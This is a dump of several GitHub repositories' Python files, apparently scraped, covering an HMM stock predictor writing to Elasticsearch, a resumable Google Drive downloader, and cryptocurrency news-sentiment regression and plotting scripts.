np.array(data['_source.change']) #(close_price - open_price) / open_price\n frac_high = np.array(data['_source.change_high']) #(high_price - open_price) / open_price\n frac_low = np.array(data['_source.change_low']) #(open_price - low_price) / open_price\n\n return np.column_stack((frac_change, frac_high, frac_low))\n\n def fit(self):\n print('Extracting Features')\n feature_vector = StockPredictor._extract_features(self.chunked_training_data)\n if self.verbose: print(\"feature vector %s\" % feature_vector)\n print('Training Model with %s features' % feature_vector.size)\n print(\"Latest date to be used in training is %s\" % self.chunked_training_data.tail(1)['_source.timestamp'].values[0])\n #self.hmm.fit(feature_vector, self.chunked_training_data_lengths)\n self.hmm.fit(feature_vector)\n print('Model trained')\n\n def _compute_all_possible_outcomes(self, n_steps_frac_change,\n n_steps_frac_high, n_steps_frac_low):\n frac_change_range = np.linspace(-0.1, 0.1, n_steps_frac_change)\n frac_high_range = np.linspace(0, 0.05, n_steps_frac_high)\n frac_low_range = np.linspace(0, 0.05, n_steps_frac_low)\n\n self.all_possible_outcomes = np.array(list(itertools.product(\n frac_change_range, frac_high_range, frac_low_range)))\n\n def json_data_for_trade(self):\n\n rows = list()\n\n # meta\n ticker = self.ticker\n date = self.prediction_date\n total_score = self.total_score\n id = \"%s-%s-%s\" % (ticker, date, total_score)\n\n meta = {\n \"index\": {\n \"_index\": TRADE_INDEX_NAME,\n \"_type\": TRADE_TYPE_NAME,\n \"_id\": id\n }\n }\n rows.append(json.dumps(meta))\n\n # data\n row = ObjDict()\n row.total_score = total_score\n row.timestamp = self.prediction_date\n row.ticker = self.ticker\n rows.append(json.dumps(row))\n\n return rows\n\n def json_data_for_outcome(self, outcome, score):\n\n rows = list()\n\n # meta\n ticker = self.ticker\n date = self.prediction_date\n vector = outcome\n id = \"%s-%s-%s\" % (ticker, date, vector)\n\n meta = {\n \"index\": {\n \"_index\": INDEX_NAME,\n \"_type\": TYPE_NAME,\n \"_id\": id\n }\n }\n rows.append(json.dumps(meta))\n\n # data\n row = ObjDict()\n row.frac_change = outcome[0]\n row.frac_high_range = outcome[1]\n row.frac_low_range = outcome[2]\n open_price = self.training_data.tail(1)['_source.open'].values[0]\n predicted_close = open_price * (1 + outcome[0])\n expected_value = outcome[0] * score\n row.predicted_close = predicted_close\n row.expected_value = expected_value\n row.timestamp = self.prediction_date\n row.score = score\n row.chunks = self.chunks\n row.delta = self.delta\n row.score = score\n row.ticker = self.ticker\n rows.append(json.dumps(row))\n\n return rows\n\n def delete_prediction_data(self, ticker):\n print(\"Deleting prediction data for ... %s\" % self.ticker)\n es.delete_by_query(index=INDEX_NAME,doc_type=TYPE_NAME, body={'query': {'match': {'ticker': self.ticker}}})\n\n def predict_outcomes(self):\n\n print(\"predicting outcomes for: %s\" % self.prediction_date)\n previous_testing_data = self.training_data.tail(self.n_latency_days).index\n\n if self.verbose:\n print(\"previous_testing_data %s\" % previous_testing_data)\n\n test_data = self.training_data.iloc[previous_testing_data]\n\n if self.verbose:\n print(\"Using the following slice of data:\")\n print(\"[%s]\" % previous_testing_data)\n print(test_data)\n\n test_data_features = StockPredictor._extract_features(test_data)\n\n # to blow everything away - may need to recreate/refresh indexes in ES!\n #self.delete_and_create_index()\n\n bulk_data = list()\n trade_data = list()\n outcome_score = []\n\n for possible_outcome in self.all_possible_outcomes:\n\n test_feature_vectors = np.row_stack((test_data_features, possible_outcome))\n score = self.hmm.score(test_feature_vectors)\n\n # ignoring scores <= 0\n if score > 0:\n rows = self.json_data_for_outcome(possible_outcome, score)\n bulk_data.append(rows)\n\n if possible_outcome[0] > 0:\n self.total_score = self.total_score + score\n if possible_outcome[0] < 0:\n self.total_score = self.total_score - score\n trade_rows = self.json_data_for_trade()\n trade_data.append(trade_rows)\n\n print(\"Exporting predictions to ES\")\n\n es_array = self.format_data_for_es(bulk_data)\n res = es.bulk(index = INDEX_NAME, body = es_array, refresh = True)\n\n es_array = self.format_data_for_es(trade_data)\n res = es.bulk(index = TRADE_INDEX_NAME, body = es_array, refresh = True)\n\n def format_data_for_es(self, data):\n es_array = \"\"\n for row in data:\n es_array += row[0]\n es_array += \"\\n\"\n es_array += row[1]\n es_array += \"\\n\"\n return es_array\n\ndef delete_all_prediction_data():\n print(\"Deleting all PREDICTION data\")\n es.delete_by_query(index=INDEX_NAME,doc_type=TYPE_NAME, body={'query': {'match_all': {}}})\n\nif __name__ == '__main__':\n arguments = docopt(__doc__, version='train 0.1')\n ticker = arguments['<ticker>']\n date = arguments['<date>']\n\n if ticker == \"ALL\":\n print(\"Training all models\")\n\n if date == \"ALL\":\n delete_all_prediction_data()\n print(\"Fetching dates ...\")\n res = es.search(index=\"market\", doc_type=\"quote\", size=10000, body={\"query\": { \"range\" : { \"timestamp\" : { \"gte\" : \"2019-03-10T06:00:00\"}}}})\n rows = json_normalize(res['hits']['hits'])\n print(rows)\n for row in rows.iterrows():\n try:\n actual_date = row[1]['_source.timestamp']\n ticker = row[1]['_source.ticker']\n\n print(\"predicting %s on %s\" % (ticker, actual_date))\n stock_predictor = StockPredictor(ticker=ticker, verbose=False, chunks=9, delta = 0, prediction_date = actual_date)\n stock_predictor.fit()\n stock_predictor.predict_outcomes()\n\n except:\n print(\"Failed to train models for %s\" % ticker)\n else:\n\n stock_predictor = StockPredictor(ticker=ticker, verbose=False, chunks=9, delta = 0, prediction_date = date)\n #stock_predictor.delete_prediction_data(ticker)\n stock_predictor.fit()\n stock_predictor.predict_outcomes()\n" }, { "alpha_fraction": 0.5970394611358643, "alphanum_fraction": 0.6087582111358643, "avg_line_length": 31, "blob_id": "7ece05401fb188fa48f08b16e000a5e932961b41", "content_id": "831a0de0da71eec3cdb67a7eb10b46f3a6fd8b87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4864, "license_type": "no_license", "max_line_length": 161, "num_lines": 152, "path": "/accuracy.py", "repo_name": "chandrab/bombogenesis", "src_encoding": "UTF-8", "text": "\"\"\"accuracy.py\n\nUsage:\n accuracy.py\n\n\"\"\"\n\nimport warnings\nimport logging\nimport itertools\nimport pandas as pd\nimport numpy as np\n#import matplotlib.pyplot as plt\nfrom hmmlearn.hmm import GaussianHMM, MultinomialHMM, GMMHMM\nfrom sklearn.model_selection import train_test_split\nfrom tqdm import tqdm\nfrom docopt import docopt\nfrom elasticsearch import helpers, Elasticsearch\nimport csv\nfrom pandas.io.json import json_normalize\nfrom datetime import datetime, timedelta\nfrom objdict import ObjDict\nimport json\nimport datetime\n\nINDEX_NAME = 'predictions'\nTYPE_NAME = 'outcome'\nTRADE_TYPE_NAME = 'accuracy'\nTRADE_INDEX_NAME = 'accuracy'\nID_FIELD = 'date'\n\nes = Elasticsearch()\n\nclass ESProxy(object):\n\n def delete_and_create_index(self):\n\n if es.indices.exists(INDEX_NAME):\n print(\"deleting '%s' index...\" % (INDEX_NAME))\n res = es.indices.delete(index = INDEX_NAME)\n\n request_body = {\n \"settings\" : {\n \"number_of_shards\": 1,\n \"number_of_replicas\": 0\n }\n }\n print(\"creating '%s' index...\" % (INDEX_NAME))\n res = es.indices.create(index = INDEX_NAME, body = request_body)\n\nclass AccuracyCalculator(object):\n\n def __init__(self, ticker, verbose=False, prediction_date=None):\n\n self.verbose = verbose\n self.ticker = ticker\n self.prediction_date = prediction_date\n self.fetch_data()\n self.calculate()\n\n def fetch_data(self):\n\n print(\"Fetching stock data ...\")\n res = es.search(index=\"market\", doc_type=\"quote\", size=10000, body={\"query\": {\"match\": {\"ticker\": self.ticker}}})\n self.stock_data = json_normalize(res['hits']['hits'])\n\n print(\"Fetching recommendation data ...\")\n res = es.search(index=\"recommendation\", doc_type=\"trades\", size=10000, body={\"query\": {\"match\": {\"ticker\": self.ticker}}})\n self.recommendation_data = json_normalize(res['hits']['hits'])\n\n def json_data_for_accuracy(self):\n\n rows = list()\n\n # meta\n ticker = self.ticker\n date = self.prediction_date\n prediction = self.prediction\n id = \"%s-%s-%s\" % (ticker, date, prediction)\n\n meta = {\n \"index\": {\n \"_index\": TRADE_INDEX_NAME,\n \"_type\": TRADE_TYPE_NAME,\n \"_id\": id\n }\n }\n rows.append(json.dumps(meta))\n\n # data\n row = ObjDict()\n row.result = self.result\n row.prediction = self.prediction\n row.prediction_date = self.prediction_date\n row.ticker = self.ticker\n row.accuracy = self.accuracy\n rows.append(json.dumps(row))\n\n return rows\n\n def calculate(self):\n\n accuracy_data = list()\n accuracy = False\n\n #print(\"total score for %s was %s, close that day was %s\" % (self.ticker, self.recommendation_data, self.stock_data))\n result = self.stock_data.loc[self.stock_data['_source.timestamp'] == self.prediction_date].tail(1)['_source.change'].values[0]\n prediction = self.recommendation_data.loc[self.recommendation_data['_source.timestamp'] == self.prediction_date].tail(1)['_source.total_score'].values[0]\n if result > 0 and prediction > 0: accuracy = True\n if result < 0 and prediction < 0: accuracy = True\n\n self.result = result\n self.prediction = prediction\n self.accuracy = accuracy\n print(\"accuracy:%s score %s result %s\" % (accuracy, prediction, result))\n\n accuracy_rows = self.json_data_for_accuracy()\n accuracy_data.append(accuracy_rows)\n\n print(\"Exporting accuracy to ES\")\n es_array = self.format_data_for_es(accuracy_data)\n res = es.bulk(index = TRADE_INDEX_NAME, body = es_array, refresh = True)\n\n def format_data_for_es(self, data):\n es_array = \"\"\n for row in data:\n es_array += row[0]\n es_array += \"\\n\"\n es_array += row[1]\n es_array += \"\\n\"\n return es_array\n\n\ndef delete_all_accuracy_data():\n print(\"Deleting all accuracy data\")\n es.delete_by_query(index=\"accuracy\",doc_type=\"accuracy\", body={'query': {'match_all': {}}})\n\nif __name__ == '__main__':\n # \"2019-01-02T06:00:00\"\n\n delete_all_accuracy_data()\n print(\"Fetching dates ...\")\n res = es.search(index=\"predictions\", doc_type=\"outcome\", size=10000, body={\"query\": { \"range\" : { \"timestamp\" : { \"gte\" : \"2019-03-10T06:00:00\"}}}})\n rows = json_normalize(res['hits']['hits'])\n print(rows)\n\n for row in rows.iterrows():\n actual_date = row[1]['_source.timestamp']\n ticker = row[1]['_source.ticker']\n print(\"calculating accuracy for %s on %s\" % (ticker, actual_date))\n accuracy_calculator = AccuracyCalculator(ticker=ticker, verbose=True, prediction_date = actual_date)\n accuracy_calculator.calculate()\n" } ]
5
eddyod/gdrive
https://github.com/eddyod/gdrive
c5ef935ee55fa5a834718c7361493e08ddf69ece
9802bfe6d24825714b7dc7f89363ba3346a314d7
4a50c32f5a16dd2804887f1bcafa8898e768ab7b
refs/heads/master
2020-04-27T13:54:13.516178
2019-03-07T17:16:59
2019-03-07T17:16:59
174,388,302
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7673797011375427, "alphanum_fraction": 0.7887700796127319, "avg_line_length": 52.42856979370117, "blob_id": "188bb6ec122f0eed789f3ea611df726e020a7cf4", "content_id": "6131467fe3fe8a2d4e279a6625d1a5be7db4f382", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 374, "license_type": "no_license", "max_line_length": 94, "num_lines": 7, "path": "/README.md", "repo_name": "eddyod/gdrive", "src_encoding": "UTF-8", "text": "This script is based on an issue from: \nhttps://stackoverflow.com/questions/38511444/python-download-files-from-google-drive-using-url\n\nI modified it to check for an existing file. If it finds the file, it\nwill continue from that point instead of downloading the whole file\nagain. Similar to what 'wget -c' does. My router was bombing out with\nlarge downloads. Thanks At&t!\n" }, { "alpha_fraction": 0.6076632738113403, "alphanum_fraction": 0.6125202178955078, "avg_line_length": 29.37704849243164, "blob_id": "f38b476abcc61929466b3e27d976ebc9490067de", "content_id": "26b93c9787c8f7dfb1de0f6ec9c73af921af0d6a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1853, "license_type": "no_license", "max_line_length": 86, "num_lines": 61, "path": "/gdrive.py", "repo_name": "eddyod/gdrive", "src_encoding": "UTF-8", "text": "import requests\nfrom pathlib import Path\n\n\ndef download_from_gdrive(id, destination):\n def get_confirm_token(response):\n for key, value in response.cookies.items():\n if key.startswith('download_warning'):\n return value\n\n return None\n\n def save_response_content(response, destination, readwrite):\n CHUNK_SIZE = 32768\n\n with open(destination, readwrite) as f:\n for chunk in response.iter_content(CHUNK_SIZE):\n if chunk: # filter out keep-alive new chunks\n f.write(chunk)\n\n URL = \"https://docs.google.com/uc?export=download\"\n\n params = {}\n params['id'] = id\n session = requests.Session()\n response = session.get(URL, params=params, stream=True)\n token = get_confirm_token(response)\n\n if token:\n params['confirm'] = token\n else:\n print('No token, cannot continue')\n return\n\n filePath = Path(destination)\n\n if filePath.is_file():\n resume_byte_pos = filePath.stat().st_size\n print(\"File\", destination, \" already exists, size:\", resume_byte_pos)\n resume_header = {'Range': 'bytes=%d-' % resume_byte_pos}\n response = session.get(URL, params=params, stream=True, headers=resume_header)\n readwrite = \"ab\"\n else:\n print('File', destination, 'does not exist')\n response = session.get(URL, params=params, stream=True)\n readwrite = \"wb\"\n\n print(params)\n save_response_content(response, destination, readwrite)\n\n\nif __name__ == \"__main__\":\n import sys\n if len(sys.argv) != 3:\n print(\"Usage: python3 gdrive.py FILEID destination\")\n else:\n # TAKE ID FROM SHAREABLE LINK\n file_id = sys.argv[1]\n # DESTINATION FILE ON YOUR DISK\n destination = sys.argv[2]\n download_from_gdrive(file_id, destination)\n" } ]
2
jshutler/crypto_analysis
https://github.com/jshutler/crypto_analysis
05f4517fda15eb54ea9a30ad1eaab212e45a179e
e6d6b95db740410f53a741881f604a64e701c617
6070e4d0468ae336aa3bc874158044c1eee3d21c
refs/heads/master
2022-12-18T02:41:20.426824
2020-09-20T23:22:22
2020-09-20T23:22:22
285,857,450
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6809963583946228, "alphanum_fraction": 0.6926476359367371, "avg_line_length": 30.075000762939453, "blob_id": "9aaaebf1e9aa885ba8134ee36e97206fee898c43", "content_id": "5c1652dfab9eaba794c42b4676cf7a5c03e2d4f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2489, "license_type": "no_license", "max_line_length": 116, "num_lines": 80, "path": "/text_cleaning_scripts/datetime_editor.py", "repo_name": "jshutler/crypto_analysis", "src_encoding": "UTF-8", "text": "from datetime import datetime\nimport pandas as pd \nfrom pytz import timezone\n\nclass datetime_editor:\n\t'''This script will format the datetime objects we want for our analysis of the news article data set. \n\tIt will provide the datetime in pst, and give the day of week, hour, minute, and whether or not it was a weekend'''\n\tdef __init__(self, coin, year, infile, outfile):\n\t\tself.infile = infile\n\t\tself.outfile = outfile\n\t\tself.df = pd.read_csv(infile, index_col =0)\n\n\n\tdef run(self):\n\t\tself.df['date_published'] = self.get_datetime_object()\n\t\tself.df['date_published_pst'] = self.get_pst()\n\t\tself.df['month_pst'] = self.get_month_pst()\n\t\tself.df['day_of_week_pst'] = self.get_day_of_week_pst()\n\t\tself.df['hour_pst'] = self.get_hour_pst()\n\t\tself.df['minute_pst'] = self.get_minute_pst()\n\t\tself.df['second_pst'] = self.get_second_pst()\n\t\tself.df['weekend'] = self.get_weekend()\n\t\t\n\n\t\tself.df.to_csv(self.outfile) #SAVING DATA TO OUTFILE\n\n\t\tprint(f'{self.outfile} saved to disk')\n\n\n\n\tdef get_datetime_object(self):\n\t\treturn pd.to_datetime(self.df['date_published'], utc=True)\n\n\tdef get_pst(self):\n\t\t#sets the timezone to pst\n\t\treturn self.df['date_published'].dt.tz_convert(timezone('US/Pacific'))\n\n\tdef get_month_pst(self):\n\t\t#changes the vecotr into a Datetime index, which has the attributes Year, Month, Day, Hour, Etc\n\t\treturn pd.DatetimeIndex(self.df['date_published_pst']).month\n\n\tdef get_day_of_week_pst(self):\n\t\treturn pd.DatetimeIndex(self.df['date_published_pst']).dayofweek\n\n\tdef get_hour_pst(self):\n\t\treturn pd.DatetimeIndex(self.df['date_published_pst']).hour\n\n\tdef get_minute_pst(self):\n\t\treturn pd.DatetimeIndex(self.df['date_published_pst']).minute\n\n\tdef get_second_pst(self):\n\t\treturn pd.DatetimeIndex(self.df['date_published_pst']).second\n\n\tdef get_weekend(self):\n\t\t# print(self.df['day_of_week_pst'])\n\t\treturn self.df['day_of_week_pst'].apply(lambda row : 0 if (row >= 0 and row <=4) else 1)\n\n\t\t\n\n\n\n\n\t\t\n\n\nif __name__ == '__main__':\n\t\n\tcoins = ['bitcoin', 'ethereum', 'Zcash', 'litecoin']\n\tyears = range(2018, 2020)\n\tfor year in years:\n\t\tfor coin in coins:\n\t\t\t#establishign where we are reading and writing our data to\n\t\t\tinfile = f'../data/news_data_collected_01_2020/preprocessed_data/{year}/{year}_{coin}_dataframe.csv'\n\t\t\toutfile = f'../data/news_data_collected_01_2020/processed_data/{year}/{year}_{coin}_dataframe.csv'\n\t\t\n\n\t\teditor = datetime_editor(coin, year, infile, outfile)\n\t\teditor.run()\n\t# editor = datetime_editor(2017, 'bitcoin')\n\t# editor.get_weekend()\n\t\n\n" }, { "alpha_fraction": 0.7829457521438599, "alphanum_fraction": 0.7829457521438599, "avg_line_length": 63.5, "blob_id": "a26829e0416d2a9950c123351b926f25dacf4bc5", "content_id": "0244788986be7992a9eaec493634bffe7d879af3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 258, "license_type": "no_license", "max_line_length": 178, "num_lines": 4, "path": "/scraper_scripts/README.md", "repo_name": "jshutler/crypto_analysis", "src_encoding": "UTF-8", "text": "#news_scraper.py\nThis script will use the Contextual News Search API (https://rapidapi.com/contextualwebsearch/api/web-search) to gather news data based on a given key word in a given time frame.\n\nThis will then gather that data, and place it in a csv file. " }, { "alpha_fraction": 0.7208297252655029, "alphanum_fraction": 0.7208297252655029, "avg_line_length": 25.930233001708984, "blob_id": "d84afaec4281970aede9d240d8ca134138d5b5e2", "content_id": "b01a8cf7660ae08795dc7a601799a929fb6a0d0e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1157, "license_type": "no_license", "max_line_length": 130, "num_lines": 43, "path": "/regression_analysis/display_SLRM_results.py", "repo_name": "jshutler/crypto_analysis", "src_encoding": "UTF-8", "text": "from statsmodels.regression.linear_model import OLSResults\nfrom os import listdir\nimport pandas as pd \n\n\ndef main(models):\n\t#models is the list of model names\n\tr_squareds = []\n\tcoefficients = []\n\tstanderd_errors = []\n\tresiduals = []\n\n\tfor model in models:\n\t\t\n\n\t\tresults = OLSResults.load(f'regression_models/return_predictions/{coin}/{model}')\n\t\tr_squareds.append(results.rsquared)\n\t\tcoefficients.append(tuple(results.params))\n\t\tstanderd_errors.append(tuple(results.bse))\n\t\tresiduals.append(results.df_resid)\n\n\t\t# model_dict.update({model, [results.rsquared, results.params,results.bse]})\n\n\t\n\tmodel_dict = {'r_squareds': r_squareds, 'coefficients': coefficients, 'standerd_errors': standerd_errors, 'residuals': residuals}\n\n\tprint(model_dict)\n\n\n\tmodel_df = pd.DataFrame(model_dict, index=models).sort_values('r_squareds', ascending=False)\n\n\tprint(model_df)\n\n\t\n\tmodel_df.to_csv(f'results/return_predictions/{coin}_model_results.csv')\n\tprint('model saved to \"model_df.csv\"')\n\n\nif __name__ == '__main__':\n\tcoins = ['bitcoin', 'ethereum', 'Zcash', 'litecoin']\n\tfor coin in coins:\n\t\tmodels = listdir(f'regression_models/return_predictions/{coin}')\n\t\tmain(models)" }, { "alpha_fraction": 0.6862068772315979, "alphanum_fraction": 0.6965517401695251, "avg_line_length": 26.821918487548828, "blob_id": "b0caff82ddef784e77b4bcd4166def40f89b4814", "content_id": "a818763c8624aa5745416e3087f4f5c70b28c9ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2030, "license_type": "no_license", "max_line_length": 119, "num_lines": 73, "path": "/analysis_scripts/merge_news_and_minute.py", "repo_name": "jshutler/crypto_analysis", "src_encoding": "UTF-8", "text": "import pandas as pd \nfrom math import log\nfrom datetime import datetime\nfrom os import listdir\n\n\n\ndef main(year, coin, minute_data_infile, news_data_infile, outfile):\n\t#this file will merge the minute data and the news_data into one file\n\n\t\n\t\n\t#making sure we only merge data for data we have\n\tminute_data_file_name = f'gemini_{coin_ticker}_{year}_1min.csv'\n\tclean_csv_df_file_name = f'{year}_{coin}_dataframe.csv'\n\n\t\n\tminute_data = pd.read_csv(minute_data_infile)\n\t\n\t\n\tnews_df = pd.read_csv(news_data_infile, index_col=1)\n\t\n\n\n\tprint(minute_data.columns)\n\tprint(news_df.columns)\n\n\t#gives us the log returns for each value\n\tminute_data['log_returns'] = minute_data['Close'].apply(log)\n\t\n\n\t#converts all strings, to datetime objects. Then makes all the seconds 0 in order\n\t#to match the minutes for the minute date data frame.\n\tnews_df['date_published'] = pd.to_datetime(news_df['date_published'], utc=True).apply(lambda dt: dt.replace(second=0))\n\tminute_data['Date'] = pd.to_datetime(minute_data['Date'], utc=True)\n\n\t#takes value of 1 or 0. Tells whether or not an article was released in that minute\n\tmerged_df = minute_data.merge(news_df, how='left',left_on='Date', right_on='date_published')\n\n\n\tmerged_df.to_csv(outfile)\n\tprint(f'{outfile} saved to disk')\n\n\n\ndef get_ticker(coin):\n\tticker_dict = {\n\t'bitcoin':'BTCUSD',\n\t'ethereum': 'ETHUSD',\n\t'Zcash': 'ZECUSD',\n\t'litecoin': 'LTCUSD'\n\t}\n\n\treturn ticker[coin]\n\n\n\n\nif __name__ == '__main__':\n\tyears = range(2018, 2020)\n\tcoins = ['bitcoin', 'ethereum', 'Zcash', 'litecoin']\n\tfor coin in coins:\n\t\tfor year in years:\n\t\t\t#gives us the coin ticker given the coin name\n\t\t\tcoin_ticker = get_ticker(coin)\n\t\t\tprint(coin_ticker)\n\n\t\t\tminute_data_infile = f'../data/crypto_minute_data/{year}/gemini_{coin_ticker}_{year}_1min.csv'\n\t\t\tnews_data_infile = f'../data/news_data_collected_01_2020/processed_data/{year}/{year}_{coin}_dataframe.csv'\n\t\t\t\n\t\t\toutfile = f'../data/news_crypto_merge/{year}/{year}_{coin}_merged_df.csv'\n\t\t\t\n\t\t\tmain(year, coin, minute_data_infile, news_data_infile, outfile)" }, { "alpha_fraction": 0.6621392369270325, "alphanum_fraction": 0.6723259687423706, "avg_line_length": 21.615385055541992, "blob_id": "788a9ea6a465793e4cff641a4d61d5d8da49dc40", "content_id": "b01152b68d4b5e41aede67b6c43c77440b139971", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 589, "license_type": "no_license", "max_line_length": 88, "num_lines": 26, "path": "/analysis_scripts/sk_learn_regression_models.py", "repo_name": "jshutler/crypto_analysis", "src_encoding": "UTF-8", "text": "import pandas as pd \nfrom sklearn import linear_model\nfrom math import log\n\n\nclass regression_maker():\n\tdef __init__(self, coin, year):\n\t\tself.coin = coin\n\t\tself.news_df = pd.read_csv(f'clean_csv_dataframes/{year}_{coin}_dataframe.csv')\n\t\tself.minute_data = pd.read_csv(f'Crypto_Data/gemini_BTCUSD_{year}_1min.csv', header=1)\n\n\n\tdef main(self):\n\t\tx = self.news_df['sentiment_polarity']\n\t\ty = self.minute_data['Close']\n\t\ty = y.apply(log)\n\n\t\tprint(y)\n\t\tmodel = linear_model.LinearRegression().fit(x,y)\n\n\n\n\nif __name__ == '__main__':\n\tmaker = regression_maker('bitcoin', 2017)\n\tmaker.main()\n\n" }, { "alpha_fraction": 0.6590577960014343, "alphanum_fraction": 0.6618099212646484, "avg_line_length": 37.13580322265625, "blob_id": "785a541bb9d452e6ca780b0a8455abff9de69f80", "content_id": "967e98c524d257677f4d071ae31238c1937f848f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6177, "license_type": "no_license", "max_line_length": 123, "num_lines": 162, "path": "/analysis_scripts/plot_regression_results.py", "repo_name": "jshutler/crypto_analysis", "src_encoding": "UTF-8", "text": "import pandas as pd \nimport matplotlib.pyplot as plt \nfrom statsmodels.regression.linear_model import OLSResults\nfrom os import listdir\nimport seaborn as sn; sn.set()\nfrom pprint import pprint\nclass plot_regression_results:\n\n\tdef __init__(self, dependent_variable='return', save=False, show=False):\n\t\tself.dependent_variable = dependent_variable\n\t\tself.save=save\n\t\tself.show=show\n\n\n\tdef main(self, pickle_names, path=None):\n\t\t#will give me the first results, bit coin in this case\n\t\t#run plots for all coins\n\t\tfor pickle_name in pickle_names:\n\t\t\tdf = pd.read_pickle(path+pickle_name).reset_index()\n\t\t\tdf[['coefficients', 'standerd_errors']] = df[['coefficients', 'standerd_errors']].round(2)\n\t\t\tdf = df[df['residuals'] > 100]\n\t\t\tcoin = pickle_name.split('_')[0]\n\t\t\tprint(coin)\n\n\t\t\t# self.plot_r_squareds(df, coin)\n\t\t\tself.plot_coefficients(df, coin)\n\n\tdef plot_r_squareds(self, df, coin):\n\t\t##########################################################################\n\t\t#this janky ass code converts the times coefficient to an integer, sorts the \n\t\t#whole df by 'times' then converts times back into a string\n\t\tdf['times'] = df['times'].apply(int)\n\t\tdf = df.sort_values(by='times')\n\t\tdf['times'] = df['times'].apply(str)\n\t\t################################################################\n\t\tx = df['times']\n\t\ty=df['r_squareds']\n\n\t\tplt.errorbar(x=x, y=y, fmt= 'o', marker ='.')\n\t\tplt.axhline(y=0, color='r', linestyle= '-')\n\t\tplt.xlabel('Times')\n\t\tplt.ylabel('R^2')\n\t\tplt.title(f'{coin}: {self.dependent_variable}')\n\n\t\tif self.save:\n\t\t\tplt.savefig(f'plots/{self.dependent_variable}_analysis/regression_plots/r_squareds/{coin}_rsquared_plot')\n\t\t\tprint('saved figure')\n\t\t\n\t\tif self.show:\n\t\t\tplt.show()\n\t\telse:\n\t\t\tplt.close()\n\t\t\n\tdef plot_coefficients(self, df,coin):\n\t\tprint(df.columns)\n\t\tindex = df.index\n\n\t\t#gives a uniques list of all formulas\n\t\tformulas = list(df['formulas'].drop_duplicates())\n\n\t\t#generate a data frame with only the best r^2 for each data frame\n\t\tbest_df = self.get_best_df(df, formulas)\t\n\t\t#this will let me access the coeffients within the tuple in the dataframe\n\t\t\n\n\t\t# print(df)\n\t\t# print(df[['coefficients', 'standerd_errors']])\n\t\taggregate_polarity_dict = {'times': [], 'coefficients': [], 'standerd_errors': []}\n\t\tpolarity_squared_dict = {'times': [], 'coefficients': [], 'standerd_errors': []}\n\t\tpolarity_cubed_dict = {'times': [], 'coefficients': [], 'standerd_errors': []}\n\t\thigh_sentiment_dict = {'times': [], 'coefficients': [], 'standerd_errors': []}\n\t\tprint(df['coefficients'][1])\n\n\t\t#this loop will give me all of my data in dictionaries aggregated appropriately\n\t\tfor index, row in df.iterrows():\n\t\t\tcoefs = list(row['coefficients'].index)\n\n\t\t\t#the following set of if statements creates dictionaries with wanted attributes\n\t\t\t#in the regression models that contain that specific coefficient \n\t\t\tif 'aggregate_polarity' in coefs:\n\t\t\t\taggregate_polarity_dict['times'].append(row['times'])\n\t\t\t\taggregate_polarity_dict['coefficients'].append(row['coefficients']['aggregate_polarity'])\n\t\t\t\taggregate_polarity_dict['standerd_errors'].append(row['standerd_errors']['aggregate_polarity'])\n\n\t\t\tif 'power(aggregate_polarity, 2)' in coefs:\n\t\t\t\tpolarity_squared_dict['times'].append(row['times'])\n\t\t\t\tpolarity_squared_dict['coefficients'].append(row['coefficients']['aggregate_polarity'])\n\t\t\t\tpolarity_squared_dict['standerd_errors'].append(row['standerd_errors']['aggregate_polarity'])\n\n\t\t\tif 'power(aggregate_polarity, 3)' in coefs:\n\t\t\t\tpolarity_cubed_dict['times'].append(row['times'])\n\t\t\t\tpolarity_cubed_dict['coefficients'].append(row['coefficients']['aggregate_polarity'])\n\t\t\t\tpolarity_cubed_dict['standerd_errors'].append(row['standerd_errors']['aggregate_polarity'])\n\n\n\t\t\tif 'high_sentiment' in coefs:\n\t\t\t\thigh_sentiment_dict['times'].append(row['times'])\n\t\t\t\thigh_sentiment_dict['coefficients'].append(row['coefficients']['aggregate_polarity'])\n\t\t\t\thigh_sentiment_dict['standerd_errors'].append(row['standerd_errors']['aggregate_polarity'])\n\n\n\t\t\n\t\tdictionaries = [aggregate_polarity_dict, polarity_squared_dict, polarity_cubed_dict, high_sentiment_dict]\n\t\tcoefficient_name = ['aggregate_polarity', 'polarity_squared', 'polarity_cubed', 'high_sentiment']\n\t\tprint(type(aggregate_polarity_dict['times'][0]))\n\n\t\tcoef_dfs = [pd.DataFrame(coef) for coef in dictionaries]\n\n\n\n\t\t#finally, it is time to make some plots\n\t\tfor coefficient, coefficient_name in zip(coef_dfs, coefficient_name):\n\t\t\t##########################################################################\n\t\t\t#this janky ass code converts the times coefficient to an integer, sorts the \n\t\t\t#whole df by 'times' then converts times back into a string\n\t\t\tcoefficient['times'] = coefficient['times'].apply(int)\n\t\t\tcoefficient = coefficient.sort_values(by='times')\n\t\t\tcoefficient['times'] = coefficient['times'].apply(str)\n\t\t\t################################################################\n\n\t\t\tx = coefficient['times']\n\t\t\ty = coefficient['coefficients']\n\t\t\tstanderd_errors = coefficient['standerd_errors']\n\t\t\t# plt.scatter(x=x, y=y)\n\t\t\tplt.errorbar(x=x, y=y, yerr=standerd_errors, fmt='o', ecolor='r', elinewidth=2, marker='.')\n\n\t\t\tplt.ylim(bottom=-2, top=1)\n\t\t\t\n\t\t\tplt.axhline(y=0, color='c', linestyle= '-')\n\n\t\t\tplt.title(coefficient_name)\n\n\t\t\tplt.xlabel('times')\n\t\t\tplt.ylabel('Beta')\n\t\t\tif self.save:\n\t\t\t\tplt.savefig(f'plots/{self.dependent_variable}_analysis/regression_plots/coefficients/{coin}_{coefficient_name}_plot')\t\t\n\t\t\t\tprint('saved figure')\n\t\t\t\n\t\t\tif self.show:\n\t\t\t\tplt.show()\n\t\t\telse:\n\t\t\t\tplt.close()\n\n\n\n\tdef get_best_df(self, df,formulas):\n\t\t'''gives the dataframe with only the highest r^2 values'''\n\t\tbest_df = []\n\t\tfor formula in 